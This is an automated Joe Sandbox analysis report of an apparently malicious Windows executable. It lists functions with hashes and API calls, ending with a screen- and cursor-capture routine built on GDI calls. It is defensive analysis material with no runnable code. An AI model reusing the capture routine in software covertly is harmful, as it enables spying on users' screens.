Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
Opcode Fuzzy Hash: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4

Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F4F3,00000001), ref: 0044F262

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
Opcode Fuzzy Hash: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614

Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9

EnumSystemLocalesW.KERNEL32(Function_000458CE,00000001,0046B680,0000000C), ref: 0044594C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E

Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F087,00000001), ref: 0044F167

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754

Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
Opcode Fuzzy Hash: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6

Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction Fuzzy Hash:

Function 0043D9CC Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0043DB3C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
Instruction ID: 723622f834e47c23106d271d0d88d1dc321cab027353f38a50b8b0e2426ac40f
Opcode Fuzzy Hash: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
Instruction Fuzzy Hash: D4518BB1E0864457DF38A9A976557BFA7899B4D304F18391FD882D7382C60CED06C31E

Function 004257FB Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

@, xrefs: 00425852

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction ID: 6198f9fd5856e2fadc0eee1ef7bf8112c6a5ea678d4112deff0a08df7cd0a8a1
Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction Fuzzy Hash: 83410975A187458BC344CF29C58061BFBE1FFD8314F645A1EF889A3350D7B9E9828B86

Function 0044ABA9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
Instruction ID: ac95e4143a92ff0618d82a399ec7b133dd136baee215df138bf5792b33e3284f
Opcode Fuzzy Hash: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
Instruction Fuzzy Hash: 7B322621D29F414DE7239A35C872336A24CEFB73C9F15D737E81AB5AA6EB28C4834144

Function 0041CEAF Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfe1dba00841067e185db543baddc51ec719100166669f3b49a19c95eafed37
Instruction ID: ddb96738fd74990a51aa4d57cd7ecd2d3edd4d3efe0166ecbb7dd1f918ebfc19
Opcode Fuzzy Hash: adfe1dba00841067e185db543baddc51ec719100166669f3b49a19c95eafed37
Instruction Fuzzy Hash: F832C6B1A087459BC719DF28C8807ABB7E1BF85318F04462EF89587381D778DD85CB8A

Function 00425152 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199ba30b8d3b8772c08d07e40edcb85330ea6891d98c7dc88682a917a24b3e4f
Instruction ID: 5c6380b7442203eb09b5b6243dbf6f2b0d892e6a2da6515435673998fb66d49f
Opcode Fuzzy Hash: 199ba30b8d3b8772c08d07e40edcb85330ea6891d98c7dc88682a917a24b3e4f
Instruction Fuzzy Hash: C602A471714A528FC758CF2EEC4063AB7E1AB8E306B85453EE495C7781EB34E921CB94

Function 00424BC3 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
Instruction ID: 9832893ecb8716a8230fb1444da9bced5d75184ca3800c066fd9b1088accf213
Opcode Fuzzy Hash: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
Instruction Fuzzy Hash: CEF181356246558FC304DF1DE89192BB3E1FB89306F85092EF182C7391DB78E925CB9A

Function 00435AD3 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 656262e35da032ffd0a077b83a64e39d55d78725ba1fa3deec4bc033c2bd9230
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 21C1C1322059930ADF2D4639853503FFBE15AA67B171A2B6FD4B7CB2C4FE28C524D624

Function 00435F08 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 83a77ad86d3d882556a1d1f8a871d3d99dabfb51986f73d2778cf32764f6a177
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 7FC1E3322055930ADF2D8639C53103FBBE15AA67B171B676FD4B6CB2C4FE28C524D624

Function 0043569E Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 2e2fcf76ea68e3d1ce03a604506cc299a951e5de5e734e711f809c72e20f7287
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 12C1C2322059934ADF2D4639857103FBBE15EA67B1B1A276FD4B7CB2C0FE28C524D624

Function 00435286 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: cc9b1a5688ee457b4940033b23912546db57db7e3d6d8e70cc9d87b8c0cd44da
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 25C1F6322059930ADF2D463AC53113FBBE15AA57B171A276FD8B7CB2C4FE28C524C614

Function 0041B917 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4acb0c57b36eb3415ac6b495fb2fe374479695d9aeff5f562a86b8f44aae54b
Instruction ID: d47e39d1b20c68f472f2cbcbc0b1e5e76a9f7a6e19272067298aabf3f738eb94
Opcode Fuzzy Hash: a4acb0c57b36eb3415ac6b495fb2fe374479695d9aeff5f562a86b8f44aae54b
Instruction Fuzzy Hash: E1B184791142998ACB05EF68C4913F63BA1EF6A300F0850B9EC9CCF757E3398506EB64

Function 0043DE2A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
Instruction ID: ae92f65c41008aac329c7d646b8d99fb38e08d933e524e45c1d49ddbea67f2dd
Opcode Fuzzy Hash: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
Instruction Fuzzy Hash: 36616671E00B0866DA389A2968927BF2795DB2D708F14392FF483DF3C1C66D9D42C65E

Function 0043DBFB Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
Instruction ID: 66342361016897109e24a26c448f772de671845df11bd1e198e526645aade2d2
Opcode Fuzzy Hash: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
Instruction Fuzzy Hash: CD518970E10A0556DB394969B9957BF379A9F1E304F18380FE842DB382C28CDD06D35E

Function 00425964 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716b1dae2f0c2af9dbf7ff04b076b7452853e6ae29ff5b9cb42b3bd13e1c206f
Instruction ID: 6d2995492066a9b16b195f6531796c1ccffa7af2014367dacfc1c2128089f42d
Opcode Fuzzy Hash: 716b1dae2f0c2af9dbf7ff04b076b7452853e6ae29ff5b9cb42b3bd13e1c206f
Instruction Fuzzy Hash: 49617F326083049FC304DF75E482A5FB7E4AFCC718F450E2EF49996251E774EA088B86

Function 00436510 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 3c347dad04b4a8ced02cdc3a1d1f73fe72ec142e803a1f09a224371d112cc28a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: E811297720104373E6158A2DF4B86B7A7A5EACD320F2FE377C0424B75CC12AD5559508

Function 00416E7E Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 307windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
CreateCompatibleDC.GDI32(00000000), ref: 00416EA5

Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
DeleteDC.GDI32(00000000), ref: 00416F32
DeleteDC.GDI32(00000000), ref: 00416F35
DeleteObject.GDI32(00000000), ref: 00416F38
SelectObject.GDI32(00000000,00000000), ref: 00416F59
DeleteDC.GDI32(00000000), ref: 00416F6A
DeleteDC.GDI32(00000000), ref: 00416F6D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
GetCursorInfo.USER32(?), ref: 00416FAF
GetIconInfo.USER32(?,?), ref: 00416FC5
DeleteObject.GDI32(?), ref: 00416FF4
